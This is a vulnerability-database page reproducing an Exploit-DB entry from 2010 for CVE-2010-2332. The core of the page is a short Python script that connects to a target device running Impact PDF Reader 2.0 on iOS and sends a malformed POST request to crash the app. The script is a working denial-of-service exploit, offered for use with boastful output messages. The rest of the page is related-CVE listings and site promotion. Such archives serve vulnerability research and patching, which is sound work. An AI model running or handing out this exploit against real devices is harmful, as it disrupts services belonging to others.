Lucene search
+L

iOS Impact PDF Reader 2.0 - POST Method Remote Denial of Service

🗓️ 14 Jun 2010 00:00:00Reported by Nishant Das PatnaikType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 31 Views

iOS Impact PDF Reader 2.0 POST Method Remote Denial of Servic

Related
Code
ReporterTitlePublishedViews
Family
cve
CVE
CVE-2010-2332
18 Jun 201020:00
cve
cvelist
Cvelist
CVE-2010-2332
18 Jun 201020:00
cvelist
euvd
EUVD
EUVD-2010-2342
7 Oct 202500:30
euvd
nvd
NVD
CVE-2010-2332
18 Jun 201020:30
nvd
prion
Prion
Cross site request forgery (csrf)
18 Jun 201020:30
prion
# Exploit: Impact PDF Reader v2.0 for iPhone/iPod Touch POST Method Remote DoS
# Date: 14/06/2010
# Author: Nishant Das Patnaik
# Website: http://nishantdaspatnaik.yolasite.com
# Software Link: http://itunes.apple.com/us/app/impact-pdf-reader/id322140783?mt=8*
# Version: 2.0, 1.2
# Tested on: iPod 2G with iOS v3.1.3
# Note: Impact PDF Reader v2.0 and prior program versions are also vulnerable.

#!/usr/bin/env python
import os
import sys
import socket
def main(argv):
    argc = len(argv)
    if argc != 3:
        print "Usage: %s <target-ip> <target-port>" % (argv[0])
        sys.exit(0)
    host = argv[1]
    port = int(argv[2])
    print "[+] Connecting: %s:%d" % (host, port)
    payload = "POST / HTTP/1.1\r\n"
    payload += "Host: %s:%d\r\n" % (host, port)
    payload += "Content-Length: 3\r\n\r\n"
    payload += "..."
    sd = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sd.connect((host, port))
    print "[+] Sending payload..."
    print "[+] Did you see that b00m? ;) http://nishantdaspatnaik.yolasite.com"
    sd.send(payload)
    sd.close()
if __name__ == "__main__":
    main(sys.argv)
    sys.exit(0)

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

14 Jun 2010 00:00Current
5.2Medium risk
Vulners AI Score5.2
CVSS 25
EPSS0.06005
31